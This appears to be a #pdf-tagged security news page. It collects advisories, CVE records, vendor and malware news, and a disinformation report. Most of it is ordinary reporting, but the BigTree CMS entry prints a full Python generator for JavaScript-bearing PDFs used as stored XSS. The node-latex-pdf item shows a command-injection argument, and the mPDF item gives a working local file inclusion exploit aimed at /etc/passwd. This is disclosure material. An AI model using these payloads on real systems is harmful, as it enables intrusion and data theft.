Red Hat Security Advisory 2022-5908-01 - Openshift Logging Bug Fix Release. Issues addressed include denial of service and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Openshift Logging Bug Fix and security update Release (5.3.10)  
Advisory ID:       RHSA-2022:5908-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5908  
Issue date:        2022-08-04  
CVE Names:         CVE-2021-38561 CVE-2021-40528 CVE-2022-1271  
                   CVE-2022-1621 CVE-2022-1629 CVE-2022-21540  
                   CVE-2022-21541 CVE-2022-22576 CVE-2022-25313  
                   CVE-2022-25314 CVE-2022-27774 CVE-2022-27776  
                   CVE-2022-27782 CVE-2022-29824 CVE-2022-34169  
====================================================================  
1. Summary:

Openshift Logging Bug Fix Release (5.3.10)

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Openshift Logging Bug Fix Release (5.3.10)

Security Fix(es):

* golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
(CVE-2021-38561)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For OpenShift Container Platform 4.9 see the following documentation, which  
will be updated shortly, for detailed release notes:

https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html

For Red Hat OpenShift Logging 5.3, see the following instructions to apply  
this update:

https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS

5. References:

https://access.redhat.com/security/cve/CVE-2021-38561  
https://access.redhat.com/security/cve/CVE-2021-40528  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-1621  
https://access.redhat.com/security/cve/CVE-2022-1629  
https://access.redhat.com/security/cve/CVE-2022-21540  
https://access.redhat.com/security/cve/CVE-2022-21541  
https://access.redhat.com/security/cve/CVE-2022-22576  
https://access.redhat.com/security/cve/CVE-2022-25313  
https://access.redhat.com/security/cve/CVE-2022-25314  
https://access.redhat.com/security/cve/CVE-2022-27774  
https://access.redhat.com/security/cve/CVE-2022-27776  
https://access.redhat.com/security/cve/CVE-2022-27782  
https://access.redhat.com/security/cve/CVE-2022-29824  
https://access.redhat.com/security/cve/CVE-2022-34169  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYuwKd9zjgjWX9erEAQgexxAAmIzleGnLdCBu+yeCdCPsxjElzuAtfH8+  
HhAEjuIYf2vyZqIB+Pa8ghittm/s1HSv1nPAfsJBLcOY2szNZLZ/T5hwKqIDQ4M2  
b36IYTskfz0BZ0C7tha6pQF6ihc/EgVa1CfDgyQEzosDoUVZRyLUEZBh7TrD9Y8O  
mcDhUSDBFVPN3II1U40qANMi+KlkW47YjcVCR+erfG8yscoqFoD9QTmuV/JzoioL  
tBsL3CQTAjs7+bwuF8Jyh3bb4fQxjtLeh+U4D6p0Inn9soPsHTOBe5/zU5wHJtRe  
v1IW1zYgblBPUqD6n5RUzSTKmreQX+aOJLZNuY8PfFOtcMLOcYJyoz1LRFNf0Hym  
68NLNGJ0DGISmRVGBemXiwusYGtWvHgzbQWzpdXA4s2z5skjIZ8O9+iTZng9AlX3  
YsGcvMKfnCrhfFSbGYWPBZwlm0hRE/++Tfw1i110pEPdfqspH5ZvtBhrQux3COn7  
xJmK6bZVUz2MEhH02NfwdFaP8Gjd4FoRGOIqxdBrvj8TOnJIKd7npOEXS5ovgetp  
NtwkwPlt8tAB/ZQU1X4DIa84IDrEdiL88ys3KxdCtKYO3fY0Hx7DOVQqeGEdAcQ8  
HSZnALjLRyjYJ7vRE2aIUqHPW9Rh9je8vsb54UR8w/ofuYawR1evMie2OT4PSFWP  
YR+hkO1lWmo=j+Pi  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5908-01

Development of digital gateways to protect the places where we live, work, and converse need to be secure and many doors need to offer restricted access.

What our homes mean to us has been redefined over the COVID era. We now work, rest, and play within its boundaries, not only with family, but also with friends and colleagues in real life or through our computers and connected devices. This "open door" policy, spurred by the pandemic, shows no signs of abating. As a result, our homes are vulnerable in several new ways, and we need to ensure our "new normal" doesn't take advantage of our hospitality.

Homes are also becoming smarter; we're inviting in more technology that is viewing, analyzing, and understanding our daily lives: Think Ring doorbells, Alexas, Zoom, Teams, and banking apps. We are giving technology permission to have some amount of control over and insight into our lives — to do this, they need to be connected and therefore we are introducing more open doors for potentially uninvited guests.

For these reasons, Home Gateways are vital to homes in order to ensure the four walls we live in are protected from digital thieves in the same way that our front doors protect our homes. However, these Home Gateway systems will only work within the Internet of Things (IoT) if the systems and standards that link them enable clarity, comprehension, and collaboration between providers and end users. Unlike our physical homes, there are many ways into our digital home networks, and we only want invited guests.

**Building on the Baseline**

The growing concern regarding the increasing number of Internet-connected devices prompted a number of ETSI members to bring their experience in national guidance and security development together to develop EN 303 645 to act as a baseline for all IoT devices. The aim was to bring all IoT devices to the market with a level of security that started to take away uncertainty for the end user, to offer a device that provides a level of security and helps police the open doors.

However, as our homes become a more complex environment, which moves beyond the IoT, this baseline needs to be built upon. This is why ETSI created TS 103 848 to provide the opportunity to build higher and deeper defenses for now and in the future. Developed by the CYBER Technical Committee, it builds out guidance and examples of the application of the baseline and beyond, most recently encouraging a formal template to make it clear where the baseline is extended or, in rare cases, where it doesn't apply. The first related standard addressed smartphones and was released at the end of last year; the next one will focus on smart door locks. The technical specifications will secure physical devices between the in-home network and the public network, as well as the traffic between these networks, which is vital to home security.

What has been developed with this new Home Gateway security document is important in that it makes it possible to achieve a high level of baseline security at the border of the Internet and home, which is integral to our new digital homes staying secure. It also strengthens the idea that simple security models developed to be universal can be extended and applied to vertical domains without invalidating the universal model. During the entire development of the Home Gateway requirements, and continuing in the development of test and validation of the requirements, there has been involvement from all parts of the stakeholder community. This means developers, manufacturers, operators, regulators, and testers have all come together to make the common baseline and set up for the future.

**Staying Secure**

Home Gateways are the first line of security defense for connected IoT and other home devices. While a secure Home Gateway does not remove the need for strong security of local devices connected to the gateway, it can provide protection against vulnerability for legacy devices or for those devices that cannot otherwise be secured. A secure Home Gateway is therefore a key security layer of the connected home. In a world where IoT devices are in every room of our households, measures to secure them and protect citizens from malicious attacks are of the essence.

Protecting our home is something we can never be complacent about and the Home Gateway addresses and keeps secure the gateways and windows into our lives that the digital world offers. Thus, the age-old promise of the ideal work-life balance has been brought closer with the hybrid of work from home, the occasional commute, flexible working hours, and a secure Internet starting with the basics of a secure Home Gateway.

**Further Information**

The ETSI consumer cybersecurity standard is supplemented by a test specification to help manufacturers pass certification schemes, a guide to facilitate implementation, and a template to better develop future vertical standards, within the committee or other standardization bodies.

*   To help manufacturers and other stakeholders, the ETSI CYBER technical committee has also released a Technical Report, ETSI TR 103 621 **\[Note: PDF download\],** to provide guidance to implement the provisions in ETSI EN 303 645.
*   To help develop other vertical standards, ETSI has created a template **\[Note: Word doc download\]** providing a structured way to extend EN 303 645 for the vertical domain.

A Digital Home Has Many Open Doors

**What is the version information for this release?**

Microsoft Edge Version

Date Released

Based on Chromium Version

104.0.1293.47

8/5/2022

104.0.5112.79/80/81

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20220802**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20220802)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2022-2624: Chromium: CVE-2022-2624 Heap buffer overflow in PDF

A global network of inauthentic news sites present themselves as independent news outlets, offering content favoring China's government and articles critical of the US.

A fake-news influence campaign based in China is leveraging at least 72 inauthentic news sites to push content strategically aligned with the political interests of the People's Republic of China (PRC) across the globe and in multiple languages.  

The sites are linked to a Chinese public-relations firm called Shanghai Haixun Technology, according to a report from Mandiant, which dubbed the campaign "HaiEnergy." To disseminate the content, the effort makes use of various social-media accounts with hundreds of thousands of followers. 

The purpose of the campaign is to target global audiences with messaging intended to improve the international image of China — and to discredit critics of its policies. According to the new Mandiant report, the campaign narratives include promoting the reform of Hong Kong's electoral system — giving the mainland government more control over choosing candidates — and criticizing the United States and its allies.

At the start of the month, several of the sites published articles critical of US House Speaker Nancy Pelosi's recently concluded trip to Taiwan, warning her to "stay away from Taiwan."

The content also attempts to discredit outspoken government opponents, including German anthropologist Adrian Zenz, who is known for his research on China's autonomous Xinjiang territory in the northwest, where there has been a reported genocide against the Uyghur population.

This was done via website articles and social-media posts, featuring what Mandiant suspects to be "at least three fabricated letters, based on obvious grammatical errors and typos."

One letter was observed being used by a Twitter account belonging to a suspected inauthentic persona "Jonas Drosten" (@Jonas\_drosten), who posted a tweet containing images of three letters. The tweet, and one of the letters, alleges that Adrian received "financial support from US Senator Marco Rubio and former White House Chief Strategist Steve Bannon."  

The Uyghur ethnic minority community has in the past been a target of multiple other disinformation efforts.

**Outsourcing Fake News Efforts**

Mandiant researchers were not able to determine whether Shanghai Haixun Technology is aware of the fakeness of the HaiEnergy effort, but the researchers found evidence that the campaign has leveraged services and infrastructure belonging to the PR firm to host and distribute content.  

The campaign's use of third-party infrastructure allows the operators behind the campaign to obfuscate their identities while distributing content. And the use of a PR firm in this campaign may also be suggestive of recent trends noted by Meta (PDF) regarding the increased outsourcing of influence operations to third parties.

The Mandiant report also notes that actors that use PR firms may also do so to lower the barrier to entry for such activity to actors with limited experience in such areas.

"The campaign does not appear to be particularly sophisticated, as evidenced at least in part by the seeming lack of substantial engagement outside of inauthentic amplification of its content," says Ryan Serabian, senior analyst at Mandiant.  

For instance, some of the social-media accounts outright note that they've been commissioned to promote content, and their bios suggest that they were willing to do "paid promos."

Serabian explains that social-media platforms, governments, and other organizations increasingly look to root out inauthentic information activity, so he expects that actors will adapt new tactics and strategies, like contracting PR firms, to continue to achieve their aims.

"As we've highlighted, such actors might seek to leverage PR firms to distribute content, and they may also become more inventive in the types of content they distribute, such as by way of using technology like artificial intelligence-generated 'deepfake' images and videos," he says.  

This particular operation follows the efforts of Russian operatives, and those allied with Russian interests, which unleashed a deluge of disinformation and fake news to try and sow fear and confusion in Ukraine following the invasion of that nation.

Massive China-Linked Disinformation Campaign Taps PR Firm for Help

Agentless approach meets the attacker earlier to protect financial services and other large enterprises from an underserved attack vector.

**NEW YORK, NY – Aug. 3, 2022** – Deep Instinct, the first company to apply end-to-end deep learning to cybersecurity, today delivered Deep Instinct Prevention for Applications, an agentless, on-demand, antimalware solution for the enterprise that is device and operating system agnostic. This new offering revolutionizes threat protection beyond the endpoint with flexible, deploy anywhere, in-transit file scanning via API to quickly return a malicious versus benign verdict at enterprise speed. It protects any web application or cloud storage from malicious content while fully ensuring data privacy.

Until now, financial services and other industries with petabytes of data in motion each day have been at high risk from uploaded malicious content that can be detonated upon download from storage. These organizations have been relying on antiquated solutions that are slow, consume vast CPU and memory resources, and miss unknown malware, leaving this threat segment underserved.

In the wake of the pandemic, fintech transactions alone rose by 13% and their volume by 11%, indicating significant industry growth. With tens of millions of files in transit each day connected to high-value trading data, mortgage applications, insurance claims, and other sensitive information, financial institutions are at risk from unchecked malicious uploads or downloads and lack viable options to ensure infected content is not a threat to their operations or their customers. As threat actors seek alternative points of entry into enterprise environments, this risk factor will only increase. In fact, one study found that 35% of "never-before-seen" malware files were hidden in Microsoft Office and PDF files.

"As threat actors compromise points of entry beyond the endpoint, financial services institutions that exchange tens of millions of files each day are at increased risk. This was primarily created by the failure of established antivirus, network and other solutions to evolve. They are slow, can't scale or process high volumes of daily traffic or handle large file sizes, and often resort to sandboxing. As a result, they continue to miss unknown threats, and incur high infrastructure costs. "That's the worst of both worlds for an enterprise," said Guy Caspi, CEO and Co-Founder of Deep Instinct. "Deep Instinct is disrupting the cybersecurity status quo by setting a new standard for preventing malicious files, both known and unknown, before they reach storage."

Deep Instinct Prevention for Applications provides organizations an on-demand, high-speed scanning solution that prevents \>99% unknown malware hidden in files and easily scales to scan tens of millions of files per day. With very low CPU requirements, a low false-positive rate of <0.1%, near zero latency, and low processing requirements, Deep Instinct provides the most innovative solution for this underserved threat gap. A typical traditional AV solution is ineffective at preventing unknown malware, will require sandbox and cloud intelligence checks, and takes an average of 90 seconds to 3 minutes to make decisions. Traditional AV/sandbox solutions are ineffective at solving this issue as they are easily evaded and slow to respond. This increases risk and negatively affects the user experience but impacts the business by slowing down critical processes.

"Deep Instinct is addressing a major pain point of today's enterprise — their exposure to an ever-expanding number of attack vectors," said David OLeary, Field CISO – Sr. Director, Global Cybersecurity, SHI. "We look forward to bringing this truly unique solution to our enterprise customer base and helping them better protect themselves and their customers from malicious content as they exchange important files every day."

Other benefits of Deep Instinct Prevention for Applications include the following:

*   Does not rely on the cloud to provide a verdict.
*   Only the file hash ever leaves the environment, retaining full customer data privacy.
*   No customer data is used for training or updating AI models.
*   Minimal infrastructure resources, including CPU and memory usage, combined with a small footprint, ensure a low total cost of ownership.

For more product information and case studies, please visit: https://deepinstinct.com/prevention-for-applications.

**About Deep Instinct**

Deep Instinct takes a prevention-first approach to stopping ransomware and other malware using the world's first and only purpose-built, deep-learning cybersecurity framework. We predict and prevent known, unknown, and zero-day threats in <20 milliseconds, 750X faster than the fastest ransomware can encrypt. Deep Instinct has >99% zero-day accuracy and promises a <0.1% false positive rate. The Deep Instinct Prevention Platform is an essential addition to every security stack — providing complete, multilayered protection against threats across hybrid environments. For more, visit www.deepinstinct.com.

Deep Instinct Pioneers Deep-Learning Malware Prevention to Protect Mission-Critical Business Applications at Scale

BigTree CMS 4.4.16 was discovered to contain an arbitrary file upload vulnerability which allows attackers to execute arbitrary code via a crafted PDF file.

A stored cross-site scripting (XSS) vulnerability exists in BigTree-CMS 4.4.16 that allows an authenticated user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.

1.  Login as admin and access the files upload page:  
    
2.  Use the following PoC to generate malicious files:

import sys

from pdfrw import PdfWriter
from pdfrw.objects.pdfname import PdfName
from pdfrw.objects.pdfstring import PdfString
from pdfrw.objects.pdfdict import PdfDict
from pdfrw.objects.pdfarray import PdfArray

def make\_js\_action(js):
    action \= PdfDict()
    action.S \= PdfName.JavaScript
    action.JS \= js
    return action

def make\_field(name, x, y, width, height, r, g, b, value\=""):
    annot \= PdfDict()
    annot.Type \= PdfName.Annot
    annot.Subtype \= PdfName.Widget
    annot.FT \= PdfName.Tx
    annot.Ff \= 2
    annot.Rect \= PdfArray(\[x, y, x + width, y + height\])
    annot.MaxLen \= 160
    annot.T \= PdfString.encode(name)
    annot.V \= PdfString.encode(value)

    \# Default appearance stream: can be arbitrary PDF XObject or
    \# something. Very general.
    annot.AP \= PdfDict()

    ap \= annot.AP.N \= PdfDict()
    ap.Type \= PdfName.XObject
    ap.Subtype \= PdfName.Form
    ap.FormType \= 1
    ap.BBox \= PdfArray(\[0, 0, width, height\])
    ap.Matrix \= PdfArray(\[1.0, 0.0, 0.0, 1.0, 0.0, 0.0\])
    ap.stream \= """
%f %f %f rg
0.0 0.0 %f %f re f
""" % (r, g, b, width, height)

    \# It took me a while to figure this out. See PDF spec:
    \# https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf\_reference\_1-7.pdf#page=641

    \# Basically, the appearance stream we just specified doesn't
    \# follow the field rect if it gets changed in JS (at least not in
    \# Chrome).

    \# But this simple MK field here, with border/color
    \# characteristics, \_does\_ follow those movements and resizes, so
    \# we can get moving colored rectangles this way.
    annot.MK \= PdfDict()
    annot.MK.BG \= PdfArray(\[r, g, b\])

    return annot

def make\_page(fields, script):
    page \= PdfDict()
    page.Type \= PdfName.Page

    page.Resources \= PdfDict()
    page.Resources.Font \= PdfDict()
    page.Resources.Font.F1 \= PdfDict()
    page.Resources.Font.F1.Type \= PdfName.Font
    page.Resources.Font.F1.Subtype \= PdfName.Type1
    page.Resources.Font.F1.BaseFont \= PdfName.Helvetica

    page.MediaBox \= PdfArray(\[0, 0, 612, 792\])

    page.Contents \= PdfDict()
    page.Contents.stream \= """
BT
/F1 24 Tf
ET
    """

    annots \= fields

    page.AA \= PdfDict()
    \# You probably should just wrap each JS action with a try/catch,
    \# because Chrome does no error reporting or even logging otherwise;
    \# you just get a silent failure.
    page.AA.O \= make\_js\_action("""
try {
  %s
} catch (e) {
  app.alert(e.message);
}
    """ % (script))

    page.Annots \= PdfArray(annots)
    return page

if len(sys.argv) \> 1:
    js\_file \= open(sys.argv\[1\], 'r')

    fields \= \[\]
    for line in js\_file:
        if not line.startswith('/// '): break
        pieces \= line.split()
        params \= \[pieces\[1\]\] + \[float(token) for token in pieces\[2:\]\]
        fields.append(make\_field(\*params))

    js\_file.seek(0)

    out \= PdfWriter()
    out.addpage(make\_page(fields, js\_file.read()))
    out.write('result.pdf')

3.  Back to Files then we can see result.pdf have been upload:  
    
4.  When the administrator click the result.pdf it will trigger a XSS attack. In addition, after switching to a normal user, the normal user still have permission to access/site/index.php/admin/files/result.pdf and trigger a XSS attack.

CVE-2022-36197: A stored cross-site scripting (XSS) vulnerability exists in BigTree CMS 4.4.16 · Issue #392 · bigtreecms/BigTree-CMS

A command injection vulnerability affects all versions of the package node-latex-pdf.

**node-latex-pdf is susceptible to command injection**

Critical severity GitHub Reviewed Published Aug 3, 2022 • Updated Aug 10, 2022

GHSA-32fw-9wq8-9x9c: node-latex-pdf is susceptible to command injection

This affects all versions of package node-latex-pdf.

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

*   **snyk-id**
    
    SNYK-JS-NODELATEXPDF-1050426
    
*   **published**
    
    21 Jan 2021
    
*   **disclosed**
    
    11 Dec 2020
    
*   **credit**
    
    JHU System Security Lab
    

**How to fix?**

There is no fixed version for node-latex-pdf.

**Overview**

node-latex-pdf is a package that converts your latex files to pdf format.

Affected versions of this package are vulnerable to Command Injection.

**PoC**

    var a =require("node-latex-pdf");
    a("./","& touch JHU",function(){})

CVE-2020-28433: Snyk Vulnerability Database | Snyk

By Waqas
According to Trend Micro researchers, the DawDropper aims at stealing user data, in particular from banking apps on…
This is a post from HackRead.com Read the original post: New DawDropper Malware Targeting Android Devices via Play Store

****According to Trend Micro researchers, the DawDropper aims at stealing user data, in particular from banking apps on infected Android devices.****

Trend Micro security researchers have identified over a dozen malicious Android dropper apps containing **banking malware**. These apps are easily available on Google Play Store.

The scam is aimed at stealing users’ banking data to steal money from their banking apps. The stolen data includes PIN codes, banking credentials, passwords, etc. The malware can intercept text and gain complete control of the affected device.

> “We found a malicious campaign that uses a new dropper variant that we have dubbed as DawDropper. Under the guise of several Android apps such as Just In: Video Motion, Document Scanner Pro, Conquer Darkness, simpli Cleaner, and Unicc QR Scanner.”  
> 
> Trend Micro

Research revealed that DawDropper malware used a third-party cloud service Firebase Realtime Database to **evade detection** and obtain a payload download address. Additionally, it hosts payloads on GitHub.   

**What are Dropper Apps?**

According to researchers at Trend Micro, cybercriminals are now distributing banking trojans through dropper apps more than ever before because this technique helps them evade detection.

Dropper apps carry the malware without raising suspicion at the **Google Play Store** security mechanism. The apps are named so because of containing a payload comprising malware that these install on the infected handset. Furthermore, mobile malware is highly in demand nowadays as cybercriminals can disseminate their malware on the official Google play store.

**Malicious Apps Details  
**

The following are the names of the malicious dropper apps discovered on the Google Play Store:  

*   Fix Cleaner
*   Crypto Utils
*   Rooster VPN
*   Extra Cleaner
*   Lucky Cleaner
*   Simpli Cleaner
*   Unicc QR Scanner
*   Conquer Darkness
*   Call Recorder APK
*   Eagle photo editor
*   Call recorder pro+
*   Universal Saver Pro
*   Just In: Video Motion
*   Super Cleaner- hyper & smart
*   Document Scanner – PDF Creator

  
According to Trend Micro’s **blog post**, the DawDropper malware’s malicious payload has been linked to the Octo malware family. It is a multi-stage, modular malware. Octo is also called Coper and was previously used for targeting Colombian online banking customers. The malicious apps aren’t available on Google Play Store anymore.

**Google To Implement New Policy Changes  
**

As per the **Google support page**, the company is implementing policy changes to the Play Store. One of the changes will come into effect from September 30th, 2022.

These changes will prevent developers from displaying full-page ads in mobile games downloaded via the Play Store, or else these will have to be closed in 15 seconds unless it is an opt-in ad to unlock rewards. Moreover, the company will ban apps with copied icons, designs, logos, or titles and **various VPN apps** from August 31.

**More Android Malware News**

1.  **300,000 Android users impacted by malware apps on Play Store**
2.  **New Android malware poses as “System Update” to steal your data**
3.  **38% of Android VPN Apps on Google Play Store Plagued with Malware**
4.  **Experts concerned over emergence of new Android banking trojan S.O.V.A.**
5.  **New Android malware on Play Store disables Play Protect to evade detection**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

New DawDropper Malware Targeting Android Devices via Play Store

mPDF version 7.0 suffers from a local file inclusion vulnerability.

    # Exploit Title: mPDF 7.0 - Local File Inclusion# Google Dork: N/A# Date: 2022-07-23# Exploit Author: Musyoka Ian# Vendor Homepage: https://mpdf.github.io/# Software Link: https://mpdf.github.io/# Version: CuteNews# Tested on: Ubuntu 20.04, mPDF 7.0.x# CVE: N/A#!/usr/bin/env python3from urllib.parse import quotefrom cmd import Cmdfrom base64 import b64encodeclass Terminal(Cmd):    prompt = "\nFile >> "    def default(self, args):        payload_gen(args)def banner():    banner = """                          _____  _____  ______   ______ ___  __   __                  _       _ _                            |  __ \|  __ \|  ____| |____  / _ \ \ \ / /                 | |     (_) |                 _ __ ___  | |__) | |  | | |__        / / | | | \ V /    _____  ___ __ | | ___  _| |_                | '_ ` _ \|  ___/| |  | |  __|      / /| | | |  > <    / _ \ \/ / '_ \| |/ _ \| | __|               | | | | | | |    | |__| | |        / / | |_| | / . \  |  __/>  <| |_) | | (_) | | |_                |_| |_| |_|_|    |_____/|_|       /_/ (_)___(_)_/ \_\  \___/_/\_\ .__/|_|\___/|_|\__|                                                                               | |                                                                                                 |_|   """    print(banner)def payload_gen(fname):    payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />'    encoded_payload = quote(payload)    print("[+] Replace the content with the payload below")    print(f"Url encoded payload:\n{encoded_payload}\n")    base64enc = b64encode(encoded_payload.encode())    print(f"Base64 encoded payload:\n{base64enc.decode()}\n")if __name__ == ("__main__"):    banner()    print("Enter Filename eg. /etc/passwd")    terminal= Terminal()    terminal.cmdloop()

Tag

#pdf